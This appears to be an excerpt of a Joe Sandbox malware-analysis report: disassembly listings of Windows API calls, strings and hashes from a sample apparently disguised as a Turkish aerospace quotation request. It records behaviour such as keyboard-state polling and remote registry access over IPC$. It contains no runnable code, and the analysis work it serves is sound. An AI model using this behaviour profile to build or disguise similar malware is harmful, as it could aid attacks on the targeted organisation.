                                                                                                                                    • KillTimer.USER32(00000000,?,?,?,?,00198BBA,00000000,?), ref: 00198D1B
                                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 001D6973
                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00198BBA,00000000,?), ref: 001D69A1
                                                                                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00198BBA,00000000,?), ref: 001D69B8
                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00198BBA,00000000), ref: 001D69D4
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 001D69E6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 641708696-0
                                                                                                                                    • Opcode ID: 7c1f59faf82249e71e880a38820433a60b1ae24d019c8a019c91ede5fdd2a920
                                                                                                                                    • Instruction ID: befa8346d67d8ddacb2b9afa626b9989aa3b0c6710ec1a80f0ee06f00dd8cc2b
                                                                                                                                    • Opcode Fuzzy Hash: 7c1f59faf82249e71e880a38820433a60b1ae24d019c8a019c91ede5fdd2a920
                                                                                                                                    • Instruction Fuzzy Hash: AA619C30502700DFDF299F24E95CBA9B7F1FB52316F148519E0829B6A0CB71ADA0CFA4
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00199944: GetWindowLongW.USER32(?,000000EB), ref: 00199952
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00199862
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ColorLongWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 259745315-0
                                                                                                                                    • Opcode ID: 170f1fbf3fc5a1745fd94361f8c7ad8588a8672630ea025740276bf7b466f3ea
                                                                                                                                    • Instruction ID: cf719f9ce35b8765a63e5deddaa4350b01772bf520e053c3e6cc1c675815fd77
                                                                                                                                    • Opcode Fuzzy Hash: 170f1fbf3fc5a1745fd94361f8c7ad8588a8672630ea025740276bf7b466f3ea
                                                                                                                                    • Instruction Fuzzy Hash: 4341B435544644AFDF205F3CAC88BB93BA5EB16331F24861DF9A6872E1E7319C41DB11
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,001CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 001E9717
                                                                                                                                    • LoadStringW.USER32(00000000,?,001CF7F8,00000001), ref: 001E9720
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,001CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 001E9742
                                                                                                                                    • LoadStringW.USER32(00000000,?,001CF7F8,00000001), ref: 001E9745
                                                                                                                                    • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 001E9866
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                    • API String ID: 747408836-2268648507
                                                                                                                                    • Opcode ID: 6d66ba5ee5599d196b4bca3e297258b22feb8ee15a50a2eeec887644c764a053
                                                                                                                                    • Instruction ID: 4b5e79026c305e2971a87ce1ce6839d368f05c7d59c042b52b34346e279df71a
                                                                                                                                    • Opcode Fuzzy Hash: 6d66ba5ee5599d196b4bca3e297258b22feb8ee15a50a2eeec887644c764a053
                                                                                                                                    • Instruction Fuzzy Hash: 9C414B72800209AACF14FBE1DD86EEEB778AF66740F640065F60572092EB356F49CF61
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A
                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001E07A2
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001E07BE
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001E07DA
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 001E0804
                                                                                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 001E082C
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001E0837
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001E083C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                    • API String ID: 323675364-22481851
                                                                                                                                    • Opcode ID: 6e1b892bd5c933dd51dbffd0f5115435b64f2bfcbf78358b6e1ff9772a904cdb
                                                                                                                                    • Instruction ID: 15a7f9729c3562bc45166927940c941906b6126e117ea1bc89c9cd31ca0310d4
                                                                                                                                    • Opcode Fuzzy Hash: 6e1b892bd5c933dd51dbffd0f5115435b64f2bfcbf78358b6e1ff9772a904cdb
                                                                                                                                    • Instruction Fuzzy Hash: A5413676C10629ABDF15EBA4EC85CEDB778FF28340B144129E901B3161EB749E44CFA0
                                                                                                                                    APIs
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00203C5C
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00203C8A
                                                                                                                                    • CoUninitialize.OLE32 ref: 00203C94
                                                                                                                                    • _wcslen.LIBCMT ref: 00203D2D
                                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00203DB1
                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00203ED5
                                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00203F0E
                                                                                                                                    • CoGetObject.OLE32(?,00000000,0021FB98,?), ref: 00203F2D
                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00203F40
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00203FC4
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00203FD8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 429561992-0
                                                                                                                                    • Opcode ID: 8f4ffe5fd2dae168eb9782dc7c1efb95702563773216cde9e1b09929fb53a143
                                                                                                                                    • Instruction ID: c2e5ea61512caf79fbe7875df45b9ff355c746b20e8f112d9ff2abd6105eb12f
                                                                                                                                    • Opcode Fuzzy Hash: 8f4ffe5fd2dae168eb9782dc7c1efb95702563773216cde9e1b09929fb53a143
                                                                                                                                    • Instruction Fuzzy Hash: 6AC155716183069FD700DF68C88496BBBE9FF89744F10491DF98A9B292DB70EE05CB52
                                                                                                                                    APIs
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 001F7AF3
                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001F7B8F
                                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 001F7BA3
                                                                                                                                    • CoCreateInstance.OLE32(0021FD08,00000000,00000001,00246E6C,?), ref: 001F7BEF
                                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001F7C74
                                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 001F7CCC
                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 001F7D57
                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001F7D7A
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 001F7D81
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 001F7DD6
                                                                                                                                    • CoUninitialize.OLE32 ref: 001F7DDC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2762341140-0
                                                                                                                                    • Opcode ID: 03b8e26f7ec75f32d10696317db39537dd4cf76c90943f5cac66f0c75a592b68
                                                                                                                                    • Instruction ID: fa9b4c49e7d4da795eb4550342d8c9e41a07e9811a7a31ea8c4012b1eeb9686d
                                                                                                                                    • Opcode Fuzzy Hash: 03b8e26f7ec75f32d10696317db39537dd4cf76c90943f5cac66f0c75a592b68
                                                                                                                                    • Instruction Fuzzy Hash: 05C11A75A04109AFCB14DFA4D888DAEBBF9FF49304B148499E919DB261DB30EE41CF90
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00215504
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00215515
                                                                                                                                    • CharNextW.USER32(00000158), ref: 00215544
                                                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00215585
                                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0021559B
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002155AC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CharNext
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1350042424-0
                                                                                                                                    • Opcode ID: 8018819159ff5875504f0f6bb384dbe27a735483b6560b028ad9961f609aaa2c
                                                                                                                                    • Instruction ID: 1048a7725aeb1b61e19ceaf606c8c9fb53967d7b711f531525426eb73529fb8e
                                                                                                                                    • Opcode Fuzzy Hash: 8018819159ff5875504f0f6bb384dbe27a735483b6560b028ad9961f609aaa2c
                                                                                                                                    • Instruction Fuzzy Hash: CB619134920629EFDF109F54DC849FE7BF9FBA9320F108185F525A6290D7748AE0DBA1
                                                                                                                                    APIs
                                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001DFAAF
                                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 001DFB08
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 001DFB1A
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 001DFB3A
                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 001DFB8D
                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 001DFBA1
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 001DFBB6
                                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 001DFBC3
                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001DFBCC
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 001DFBDE
                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001DFBE9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2706829360-0
                                                                                                                                    • Opcode ID: e9d17cd37b48d3d13f52e5605651c983b7a6428cb15693df3e1d5923d1c04d0f
                                                                                                                                    • Instruction ID: 22b831bc777db1210af9950fda97761bc1f174f01dae11e11e9c5aa045c270fa
                                                                                                                                    • Opcode Fuzzy Hash: e9d17cd37b48d3d13f52e5605651c983b7a6428cb15693df3e1d5923d1c04d0f
                                                                                                                                    • Instruction Fuzzy Hash: B1416435A04219DFDF04DF64D8589EDBBB9FF18344F10806AE946A7361CB30AA46CF90
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?), ref: 001E9CA1
                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 001E9D22
                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 001E9D3D
                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 001E9D57
                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 001E9D6C
                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 001E9D84
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 001E9D96
                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 001E9DAE
                                                                                                                                    • GetKeyState.USER32(00000012), ref: 001E9DC0
                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 001E9DD8
                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 001E9DEA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                    • Opcode ID: e3a0ad406a7decb722befa574dc7c805878c1e416317552a2c2f49675280d497
                                                                                                                                    • Instruction ID: cb8af852220900e805e56902c7d9d3ad03adaaba91364d54b1a9776e580d0587
                                                                                                                                    • Opcode Fuzzy Hash: e3a0ad406a7decb722befa574dc7c805878c1e416317552a2c2f49675280d497
                                                                                                                                    • Instruction Fuzzy Hash: 9341D634504FD969FF3496A288043FDBEE1BF21344F58805ADAC65B5C2DBA499C8C7A2
                                                                                                                                    APIs
                                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 002005BC
                                                                                                                                    • inet_addr.WSOCK32(?), ref: 0020061C
                                                                                                                                    • gethostbyname.WSOCK32(?), ref: 00200628
                                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 00200636
                                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002006C6
                                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002006E5
                                                                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 002007B9
                                                                                                                                    • WSACleanup.WSOCK32 ref: 002007BF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                    • String ID: Ping
                                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                                    • Opcode ID: 2c8d5791a7ac85769c9fd627c5b3d5ade73b260e23e916a21526674a5f417449
                                                                                                                                    • Instruction ID: 68d4fc698242924dbdc3457530a4a193c7c7dd348d337d1be33f093b10ff98ad
                                                                                                                                    • Opcode Fuzzy Hash: 2c8d5791a7ac85769c9fd627c5b3d5ade73b260e23e916a21526674a5f417449
                                                                                                                                    • Instruction Fuzzy Hash: 8991AD34618302AFE720DF15D8C8F1ABBE4AF49318F1485A9E4698B6A2C774ED51CF91
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                                    • API String ID: 707087890-567219261
                                                                                                                                    • Opcode ID: 14c11634b61e82498f64e3f54887202caa62eb106c33c1a38fb8e9d3b64b2433
                                                                                                                                    • Instruction ID: 1350949ea418b1392e5a3e72a30cd866393cc5f1696adcb1ff83ed94b7919a8c
                                                                                                                                    • Opcode Fuzzy Hash: 14c11634b61e82498f64e3f54887202caa62eb106c33c1a38fb8e9d3b64b2433
                                                                                                                                    • Instruction Fuzzy Hash: DC51B331A206179BCF14DF68C9408BFB7A5BF65724B214229F4A5E72C6EB70DE50C790
                                                                                                                                    APIs
                                                                                                                                    • CoInitialize.OLE32 ref: 00203774
                                                                                                                                    • CoUninitialize.OLE32 ref: 0020377F
                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,0021FB78,?), ref: 002037D9
                                                                                                                                    • IIDFromString.OLE32(?,?), ref: 0020384C
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 002038E4
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00203936
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                    • API String ID: 636576611-1287834457
                                                                                                                                    • Opcode ID: 6b900dbee3a476deed48f9836a267f9d734e94ff80625199130664ea42172182
                                                                                                                                    • Instruction ID: 78197ddf65abed70a9ef1d402d3524e80513edb5576ddbb90e1968753c6ebc34
                                                                                                                                    • Opcode Fuzzy Hash: 6b900dbee3a476deed48f9836a267f9d734e94ff80625199130664ea42172182
                                                                                                                                    • Instruction Fuzzy Hash: EB61D070628701AFD311DF54D888F6AB7E8EF59700F104849F9859B2E2C7B0EE58CB92
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00199BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00199BB2
                                                                                                                                      • Part of subcall function 0019912D: GetCursorPos.USER32(?), ref: 00199141
                                                                                                                                      • Part of subcall function 0019912D: ScreenToClient.USER32(00000000,?), ref: 0019915E
                                                                                                                                      • Part of subcall function 0019912D: GetAsyncKeyState.USER32(00000001), ref: 00199183
                                                                                                                                      • Part of subcall function 0019912D: GetAsyncKeyState.USER32(00000002), ref: 0019919D
                                                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00218B6B
                                                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 00218B71
                                                                                                                                    • ReleaseCapture.USER32 ref: 00218B77
                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00218C12
                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00218C25
